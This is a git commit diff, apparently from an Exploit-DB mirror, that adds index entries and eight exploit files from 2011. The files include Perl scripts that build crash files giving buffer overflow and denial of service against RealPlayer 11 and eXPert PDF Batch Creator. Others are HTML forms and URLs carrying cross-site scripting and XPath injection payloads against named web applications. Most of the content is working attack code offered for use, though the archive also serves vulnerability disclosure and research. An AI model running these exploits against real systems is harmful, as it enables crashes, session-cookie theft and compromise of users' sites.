Updated 12_10_2014
This commit is contained in:
parent
6a7030ba10
commit
92c2a90af7
9 changed files with 257 additions and 0 deletions
|
@ -31965,3 +31965,11 @@ id,file,description,date,author,platform,type,port
|
|||
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
|
||||
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
|
||||
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
|
||||
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
|
||||
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
|
||||
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
|
||||
35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 'skin' Parameter Cross Site Scripting Vulnerability",2011-03-24,"AutoSec Tools",php,webapps,0
|
||||
35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0
|
||||
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
|
||||
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/multiple/remote/35495.txt
Executable file
9
platforms/multiple/remote/35495.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47008/info
|
||||
|
||||
Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.
|
||||
|
||||
An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.
|
||||
|
||||
Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.exploit-db.com/sploits/35495.zip
|
59
platforms/multiple/remote/35501.pl
Executable file
59
platforms/multiple/remote/35501.pl
Executable file
|
@ -0,0 +1,59 @@
|
|||
source: http://www.securityfocus.com/bid/47039/info
|
||||
|
||||
RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
|
||||
|
||||
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
|
||||
|
||||
RealPlayer 11.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
|
||||
###
|
||||
# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
|
||||
# Author : KedAns-Dz
|
||||
# E-mail : ked-h@hotmail.com
|
||||
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
|
||||
# Twitter page : twitter.com/kedans
|
||||
# platform : Windows
|
||||
# Impact : Buffer Overflow
|
||||
# Tested on : Windows XP SP3 Fran.ais
|
||||
# Target : RealPlayer v11.0
|
||||
###
|
||||
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
|
||||
# -----------------
|
||||
# XML version : 1.0 in (Real Metadata Package File)
|
||||
# <?xml version="1.0"?>
|
||||
# <embed src="rtsp:// **BUFFER ** " autoplay="whatever" />Null
|
||||
# -----------------
|
||||
#START SYSTEM /root@MSdos/ :
|
||||
# -----------------
|
||||
system("title KedAns-Dz");
|
||||
system("color 1e");
|
||||
system("cls");
|
||||
print "\n\n";
|
||||
print " |============================================================|\n";
|
||||
print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
|
||||
print " |= [!] Exploit : Buffer Overflow =|\n";
|
||||
print " |= [!] Author : KedAns-Dz =|\n";
|
||||
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
|
||||
print " |============================================================|\n";
|
||||
sleep(2);
|
||||
print "\n";
|
||||
# Parameter OverFlow =>
|
||||
my $kA = "\x41" x 333 ; # A * 333
|
||||
my $kB = "\x42" x 333 ; # B * 333
|
||||
my $kC = "\x43" x 333 ; # C * 333
|
||||
my $buffer = $kA.$kB.$kC ;
|
||||
my $header =
|
||||
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
|
||||
"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
|
||||
"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
|
||||
"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
|
||||
"\x2f\x3e\x00";
|
||||
# Creating ...
|
||||
my $kedans = $header ; # |=:: Header & AAA...BBB...CC etc ::=|
|
||||
open (FILE ,"> Crash.rmp"); # Evil File Here
|
||||
print FILE $kedans ;
|
||||
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
|
||||
close (FILE);
|
||||
|
27
platforms/php/webapps/35496.txt
Executable file
27
platforms/php/webapps/35496.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/47014/info
|
||||
|
||||
MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form name="hack" action="http://www.example.com/?module=users" method="post">
|
||||
<input type="hidden" name="module" value="users">
|
||||
<input type="hidden" name="action" value="remind">
|
||||
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
|
||||
</form>
|
||||
|
||||
<form name="hack" action="http://www.example.com/?module=users" method="post">
|
||||
<input type="hidden" name="module" value="users">
|
||||
<input type="hidden" name="action" value="register">
|
||||
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
|
||||
</form>
|
||||
|
||||
<form name="hack" action="http://www.example.com/?module=users" method="post">
|
||||
<input type="hidden" name="module" value="users">
|
||||
<input type="hidden" name="action" value="register">
|
||||
<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
|
||||
</form>
|
||||
|
||||
|
10
platforms/php/webapps/35497.txt
Executable file
10
platforms/php/webapps/35497.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/47015/info
|
||||
|
||||
GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert('XSS1!')</script>&uniqueId=<script>alert('XSS2!')</script>#
|
||||
http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert('XSS1!')</script>&traceLevel=<script>alert('XSS2!')</script>#
|
13
platforms/php/webapps/35498.txt
Executable file
13
platforms/php/webapps/35498.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/47017/info
|
||||
|
||||
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
|
9
platforms/php/webapps/35499.txt
Executable file
9
platforms/php/webapps/35499.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47027/info
|
||||
|
||||
netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
netjukebox 5.25 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
|
68
platforms/php/webapps/35500.txt
Executable file
68
platforms/php/webapps/35500.txt
Executable file
|
@ -0,0 +1,68 @@
|
|||
source: http://www.securityfocus.com/bid/47037/info
|
||||
|
||||
Family Connections is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
|
||||
|
||||
Family Connections 2.3.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
<!--
|
||||
|
||||
|
||||
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
|
||||
|
||||
|
||||
Vendor: Ryan Haudenschilt
|
||||
Product web page: http://www.familycms.com
|
||||
Affected version: 2.3.2
|
||||
|
||||
Summary: Family Connections is an open source
|
||||
content management system. It makes creating a
|
||||
private, family website easy and fun.
|
||||
|
||||
Desc: FCMS suffers from a stored XSS vulnerability
|
||||
(post-auth) in messageboard.php script thru the
|
||||
'subject' post parameter. XPath lies in the
|
||||
/inc/getChat.php script with 'users' get parameter with
|
||||
no args, and post parameter 'message'.
|
||||
|
||||
Tested on: Microsoft Windows XP Professional SP3 (EN)
|
||||
Apache 2.2.14 (Win32)
|
||||
PHP 5.3.1
|
||||
MySQL 5.1.41
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
liquidworm gmail com
|
||||
Zero Science Lab - http://www.zeroscience.mk
|
||||
|
||||
|
||||
Advisory ID: ZSL-2011-5004
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php
|
||||
|
||||
|
||||
22.03.2011
|
||||
|
||||
|
||||
-->
|
||||
|
||||
|
||||
|
||||
<html>
|
||||
<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
|
||||
<body bgcolor="#1C1C1C">
|
||||
<script type="text/javascript">
|
||||
function xpath(){document.forms["xpath"].submit();}
|
||||
function xss(){document.forms["xss"].submit();}
|
||||
</script>
|
||||
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xpath">
|
||||
<input type="hidden" name="message" value="\\';--\\";--" /></form>
|
||||
<a href="javascript: xpath();" style="text-decoration:none">
|
||||
<b><font color="red"><center><h3><br /><br />Exploit XPath!<h3></center></font></b></a>
|
||||
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
|
||||
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
|
||||
<input type="hidden" name="post" value="waddup" />
|
||||
<input type="hidden" name="name" value="1" />
|
||||
<input type="hidden" name="post_submit" value="Submit" /></form>
|
||||
<a href="javascript: xss();" style="text-decoration:none">
|
||||
<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
|
||||
</body></html>
|
54
platforms/windows/dos/35502.pl
Executable file
54
platforms/windows/dos/35502.pl
Executable file
|
@ -0,0 +1,54 @@
|
|||
source: http://www.securityfocus.com/bid/47040/info
|
||||
|
||||
eXPert PDF is prone to a denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
|
||||
|
||||
eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
|
||||
###
|
||||
# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
|
||||
# Author : KedAns-Dz
|
||||
# E-mail : ked-h@hotmail.com
|
||||
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
|
||||
# Twitter page : twitter.com/kedans
|
||||
# platform : Windows
|
||||
# Impact : Blocked 'vsbatch2pdf.exe' When Generate
|
||||
# Tested on : Windows XP SP3 Fran?ais
|
||||
# Target : eXPert PDF Editor v7.0.880.0
|
||||
###
|
||||
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
|
||||
# ------------
|
||||
# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate
|
||||
#START SYSTEM /root@MSdos/ :
|
||||
system("title KedAns-Dz");
|
||||
system("color 1e");
|
||||
system("cls");
|
||||
print "\n\n";
|
||||
print " |=============================================|\n";
|
||||
print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
|
||||
print " |= [!] Exploit : Denial of Service Exploit =|\n";
|
||||
print " |= [!] Author : KedAns-Dz =|\n";
|
||||
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
|
||||
print " |=============================================|\n";
|
||||
sleep(2);
|
||||
print "\n";
|
||||
my $junk = "http://"."\x41" x 17425;
|
||||
open(file , ">", "Kedans.html");
|
||||
print file $junk;
|
||||
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
|
||||
close(file);
|
||||
|
||||
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
|
||||
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
|
||||
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
|
||||
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
|
||||
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
|
||||
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
|
||||
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
|
||||
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
|
||||
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
|
||||
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
|
||||
#================================================================================================
|
Loading…
Add table
Reference in a new issue